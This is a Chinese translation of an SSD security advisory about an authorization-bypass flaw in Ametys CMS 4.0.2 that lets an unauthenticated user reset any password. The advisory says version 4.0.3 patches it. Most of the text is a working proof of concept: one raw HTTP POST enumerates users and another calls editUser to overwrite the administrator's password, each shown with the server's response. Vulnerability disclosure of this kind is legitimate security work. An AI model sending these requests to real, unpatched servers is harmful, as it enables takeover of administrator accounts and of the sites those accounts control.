SSD安全公告–Ametys CMS未经身份验证

漏洞概要
下面我们将描述在Ametys CMS 4.0.2版本中发现的密码重置漏洞。
Ametys是一个免费的开源内容管理系统(CMS),它基于JSR-170存储内容,有公开的小工具和一个面向xml的框架。
漏洞提交者
一位独立的安全研究人员—何塞·路易斯(Jose Luis),向Beyond Security的SSD报告了该漏洞。
厂商响应
Ametys已经发布了修补该漏洞的补丁-Ametys CMS 4.0.3
获取更多细节:https://issues.ametys.org/browse/RUNTIME-2582

漏洞详细信息
由于对用户的输入没有进行充分的检查,导致未经验证的用户可以执行未授权的管理操作。
Ametys CMS仅在Web请求中包含/cms/时才检查授权。这样,我们就可以重置任何用户的密码,包括管理员用户。
漏洞证明
通过发送以下POST请求,我们可以获得用户列表:

POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1
Host: 192.168.196.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.196.128:8080/cms/www/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 213
Cookie: JSESSIONID=
Connection: close
content={"0":{"pluginOrWorkspace":"core","responseType":"text","url":"users/search.json","p
arameters":{"contexts":["/sites/www","/sites-
fo/www"],"criteria":"","limit":100,"page":1,"start":0}}}}&context.parameters={}

然后,服务器将响应如下:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Cocoon-Version: 2.1.13-dev
Content-Type: text/xml
Date: Tue, 03 Oct 2017 13:52:15 GMT
Connection: close
Content-Length: 1875
<?xml version="1.0" encoding="UTF-8"?><responses><response id="0" code="200"
duration="946">{"users":[{"firstname":"Simple","sortablename":"Contributor
Simple","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Simple
Contributor","login":"contrib","directory":"SQL
database","email":"contrib@example.com","lastname":"Contributor"},{"firstname":"User1","s
ortablename":"User1 User1","populationLabel":"FO Demo Users","populationId":"fo-demo-
users","fullname":"User1 User1","login":"user1@ametys.org","directory":"SQL
database","email":"user1@ametys.org","lastname":"User1"},{"firstname":"User3","sortablena
me":"User3 User3","populationLabel":"FO Demo Users","populationId":"fo-demo-
users","fullname":"User3 User3","login":"user3@ametys.org","directory":"SQL
database","email":"user3@ametys.org","lastname":"User3"},{"firstname":"Webmaster","sorta
blename":"User Webmaster","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Webmaster
User","login":"webmaster","directory":"SQL
database","email":"webmaster@example.com","lastname":"User"},{"firstname":"Manager","s
ortablename":"User Manager","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Manager
User","login":"manager","directory":"SQL
database","email":"manager@example.com","lastname":"User"},{"firstname":"Administrator"
,"sortablename":"User Administrator","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Administrator
User","login":"admin","directory":"SQL
database","email":"admin@example.com","lastname":"User"},{"firstname":"User2","sortable
name":"User2 User2","populationLabel":"FO Demo Users","populationId":"fo-demo-
users","fullname":"User2 User2","login":"user2@ametys.org","directory":"SQL
database","email":"user2@ametys.org","lastname":"User2"}]}</response></responses>

从服务器的响应中可以获取到字段“populationId”和“login”的值,这些值将会用于下一个请求。
现在,我们需要执行另一个请求来更改admin用户的密码:

POST /plugins/core-ui/servercomm/messages.xml HTTP/1.1
Host: 192.168.196.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.196.128:8080/cms/www/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 345
Cookie: JSESSIONID=
Connection: close
content={"0":{"pluginOrWorkspace":"core-ui","responseType":"text","url":"client-
call","parameters":{"role":"org.ametys.plugins.core.user.UserDAO","methodName":"editUser"
,"parameters":["ametys_demo_users",{"login":"admin","password":"MYNEWPASSWORD","fi
rstname":"Administrator","lastname":"User","email":"admin@example.com"}]}}}&context.par
ameters={}

执行这个请求后,服务器将响应:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Cocoon-Version: 2.1.13-dev
Content-Type: text/xml
Date: Tue, 03 Oct 2017 13:52:59 GMT
Connection: close
Content-Length: 374
<?xml version="1.0" encoding="UTF-8"?><responses><response id="0" code="200"
duration="110">{"firstname":"Administrator","sortablename":"User
Administrator","populationLabel":"Ametys Demo
Users","populationId":"ametys_demo_users","fullname":"Administrator
User","login":"admin","directory":"SQL
database","email":"admin@example.com","lastname":"User"}</response></responses>

现在,你可以使用密码MYNEWPASSWORD以管理员身份登录系统。